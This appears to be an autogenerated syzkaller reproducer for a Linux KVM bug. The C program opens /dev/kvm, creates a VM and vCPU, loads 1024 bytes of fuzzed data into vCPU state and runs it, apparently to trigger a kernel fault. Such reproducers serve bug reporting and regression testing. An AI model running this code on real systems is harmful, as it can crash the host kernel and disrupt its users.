// https://syzkaller.appspot.com/bug?id=83aa676a823eeb2855ab831541b2c8175904c281 // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); const char* reason; (void)reason; intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } memcpy((void*)0x20000000, "/dev/kvm\000", 9); res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000000ul, /*flags=*/0, /*mode=*/0); if (res != -1) r[0] = res; res = syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0xae01, /*type=*/0ul); if (res != -1) r[1] = res; syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0xae60, 0); res = syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0xae41, /*id=*/5ul); if (res != -1) r[2] = res; memcpy( (void*)0x20000c00, "\x6c\x94\x93\x85\xc5\x57\x29\x2e\x3b\xae\x74\x43\xd2\x93\x38\x08\x21\xb9" "\xa1\x28\xe6\xd4\x4f\x82\xdf\xe0\xfd\x45\xa9\xa7\x50\x57\x49\xe9\x89\x24" "\xed\xce\x08\x2b\x3d\x26\x3e\xdc\x44\xd5\x79\x53\xa7\x6d\x8c\x4d\x92\x7d" "\xe6\xe7\x39\x20\xb8\x1c\x50\x6c\x83\xaa\x70\x8c\xfd\xe9\xa9\xe1\x15\xae" "\x45\x9f\x61\x67\x15\x3c\x81\xea\x66\x9d\x9d\x26\x3d\x52\xe7\xd6\x3e\xab" "\xa7\x36\xe0\xcf\x8c\xbc\xec\x87\x1c\x34\x7b\x2e\xd4\xe1\x9c\x3f\xbd\x21" "\x7f\x98\xd4\x3d\x93\xd7\xf0\x4b\x31\x34\x56\x44\xc8\xad\x47\xc0\xcd\x44" "\x86\xc1\x3a\x4c\x3c\x6a\x0e\x95\x9d\xd4\x77\x51\x46\x5a\x0b\xba\xea\x64" "\xe1\x57\xd4\x54\x85\xab\x20\x91\xc0\xad\x8f\xa1\xdd\x05\xe5\x48\x0c\xc8" "\x08\x23\xe8\x56\xe4\x52\xe6\xd3\x3b\x69\x11\xc8\xa7\x27\x17\x24\x76\x97" "\xb4\x22\x77\x14\xcb\x8b\xac\xcb\x67\x8c\x58\x62\xf9\x4b\x7a\xb1\xf0\x02" "\x73\x20\x65\xb0\xd1\x1b\x12\x41\x8a\x99\xa5\x89\x4a\xec\xab\x3e\x2e\x69" "\x4e\x2a\x1a\x6d\x97\x84\x64\x7d\x36\x86\x69\x1d\x3f\x56\x92\x06\x37\xad" "\x9e\xf4\xce\x90\x58\x68\xeb\x03\xb0\x42\x97\xcb\xac\x05\xef\xd5\x83\xc8" "\xd2\xd1\x72\xd4\xa5\x2c\xee\xdc\xaa\xfd\xbb\x4f\xff\x8a\x84\x27\x08\x79" "\x5c\xac\x26\x94\x01\x91\x42\xa8\x67\xdd\x5d\x77\x12\xf7\x88\x1a\xd6\x7c" "\xc3\xc2\xa6\x5c\xa6\x96\x7e\xc4\x93\x98\x02\x55\x14\xc8\x3c\xe7\x29\x69" "\x3b\x78\x7f\xba\x56\x6a\x84\x00\x89\x4f\x56\x25\x0f\x75\xba\x2c\x04\xbe" "\x78\x48\x00\x4a\xba\x54\x04\x88\x23\xdd\x17\xfd\xf5\xf5\x68\x73\x36\x5b" "\xc0\xdc\x85\xc3\xe0\x6d\x1b\xc8\x5e\xfd\x9a\x00\x41\x4a\xae\xe5\x87\xd0" "\x2b\x38\xec\xa4\xce\x0d\xc8\x75\x42\x40\xf2\x59\xc4\x54\x92\x37\xae\x7d" "\xd3\x36\x8d\x4e\xbf\x43\x02\x3c\x5e\xde\xb5\x30\x24\x85\x7e\x1e\xee\x70" "\xdc\xf4\xae\x2d\x7a\x7e\xfa\xc4\x4f\x62\x55\x5a\xdf\x07\xda\x1e\x6d\x2c" "\x28\x19\xdb\x8b\x46\x84\x39\x12\x4a\xd8\xfb\xf1\x38\xdb\x0f\x8e\x13\x2d" "\xaa\x6b\x9e\x3a\xdd\xbb\xe5\x80\xa9\xdd\x77\xb7\x7e\x6e\xf5\xd6\xf4\x06" "\xbf\x92\xe4\xf8\x07\xe1\x3c\xc9\xb8\x24\x86\xb8\xe5\xe7\x3e\x4f\xcf\xe0" "\x0c\x44\x41\xa0\xea\x83\xce\xe3\xc1\x48\x4e\x45\x47\x53\xaa\xdd\x38\x00" "\x89\xbe\x4b\xc4\x35\x80\xcf\x60\x0c\xc3\x58\xd8\x1c\x15\x5b\x0d\x38\x1e" "\x27\xb4\xe9\x27\x16\x95\x3c\x2b\x59\x42\x82\x15\x51\xd6\xcc\xc1\x0d\x76" "\x76\x41\xb4\x03\x78\x46\x32\xc7\xc5\x65\xfa\xa8\x38\x69\x4c\xde\x02\xc7" "\x98\xf4\xc9\xab\x04\xaa\x08\x5f\xd4\x9b\x72\x7f\x8d\x08\x4f\x8b\x95\x49" "\x22\x0e\x15\x79\x23\xc3\x72\x63\xc3\x37\xd4\x29\xeb\x9a\x10\xe9\x62\x2a" "\x72\x02\x7f\xe5\x04\xfb\x86\x36\x6f\xf4\x10\x09\x5f\x89\x9d\x9e\x77\x0b" "\x15\x7a\xdb\x95\x73\x9c\x4c\x4c\x7b\x19\x67\x88\x06\x84\x91\x89\x7b\x2d" "\xcb\x5f\x8a\xfb\x8a\xf9\x06\xb2\x00\x54\xd0\x7f\xb6\x3c\x29\x28\x1f\xfe" "\x67\x67\xb0\x28\x7d\x95\x4c\x1f\x65\x11\x5e\xcc\x65\xdf\x27\xcd\x7f\xd0" "\x5d\xec\x5a\x18\x0b\x06\xa1\x67\xb0\x8e\x89\xf1\x5c\x9c\x18\x5d\xa6\x37" "\x3b\x3e\xdc\x60\x9f\x1f\xba\x77\x68\xa4\xa5\x65\x10\x9a\xf9\x41\x6f\xef" "\x5b\xee\x17\x8f\xb6\x78\xb2\x84\xd7\x20\xe9\x88\x83\xa3\x28\x19\xab\x9c" "\x4a\x00\xb4\xc7\x9f\x1a\x68\xb2\x9d\x82\xc0\x66\xfe\xf7\x4f\x53\xab\x88" "\xad\xe4\x51\xf1\xc6\x3a\x3d\xd0\x8f\x83\x89\x86\x69\x0c\x7a\x20\x33\x7a" "\xba\xdd\x76\xa9\x18\xb8\xf1\x31\xdd\xda\x9e\xab\xac\x2f\x9c\x1b\xa8\x2f" "\x88\x59\x91\x4a\x6b\xdb\x65\x12\x85\xb4\xa9\x18\x8b\x61\xfc\x04\x6b\x40" "\x60\x1f\xf2\x63\x1e\xfb\xf0\xbd\xbc\x54\x4f\xcf\xda\x36\x38\xc9\xeb\x97" "\x4d\xba\x41\xde\xce\x0d\x65\x71\x91\xac\x79\xb6\x67\x6d\xc8\x9d\x19\x1e" "\xf9\x14\x08\x22\x8e\x6f\x35\x4e\x96\xb4\x9e\x03\x05\xc0\xa9\xa7\x75\xe7" "\x0f\xfa\xc6\x58\x95\x7e\x96\x62\x1a\x04\x69\xfa\xe4\x72\x1e\xb9\x2b\x68" "\x52\x4e\x2e\x22\x45\x16\xb1\xb0\x00\x75\x0b\xf2\xbd\xe2\xda\xd2\x5d\x43" "\xcb\x65\xe7\xc0\x77\x97\xe5\x72\x26\xd1\x74\x83\x93\xc3\x35\x2d\x18\x93" "\x1a\xbd\xd5\x33\x3d\xe7\x73\x9c\xf1\x8f\xcc\xd7\xd1\x94\x42\x5c\x98\xd0" "\xbe\x9d\xc3\xfb\xff\xb2\x7e\x92\x5d\x89\x06\x8e\x7b\x9a\x44\xe4\x9a\x7e" "\x37\x03\xd0\xe6\x3c\xb0\x3d\x1b\x7c\x5b\x93\xb4\x4d\x02\x39\x5c\xe7\xd2" "\xb2\xaa\xc0\x5f\x1b\xf3\x5d\x94\x15\x22\xeb\x9e\xff\x65\x41\x96\x5d\xda" "\xae\x8b\xb8\xba\xeb\xb1\x90\xf8\xc2\x61\x69\x5f\xf0\x15\xc1\x70\x48\xf6" "\x26\x74\x11\x8d\x40\xa7\x21\x64\x6e\xfb\xe9\x4b\xff\x93\x9d\x8b\x45\x0f" "\x96\xad\xc5\x0c\xc3\x07\x21\xeb\xc0\xbc\xef\x7d\xf3\x66\x7b\x18\x39\xf5" "\x9f\x2e\x3e\x09\x40\xcb\x04\xf7\xc0\xcb\x50\x4b\x06\xc7\xc5\x88", 1024); syscall(__NR_ioctl, /*fd=*/r[2], /*cmd=*/0x4400ae8f, /*arg=*/0x20000c00ul); syscall(__NR_ioctl, /*fd=*/r[2], /*cmd=*/0xae80, /*arg=*/0ul); return 0; }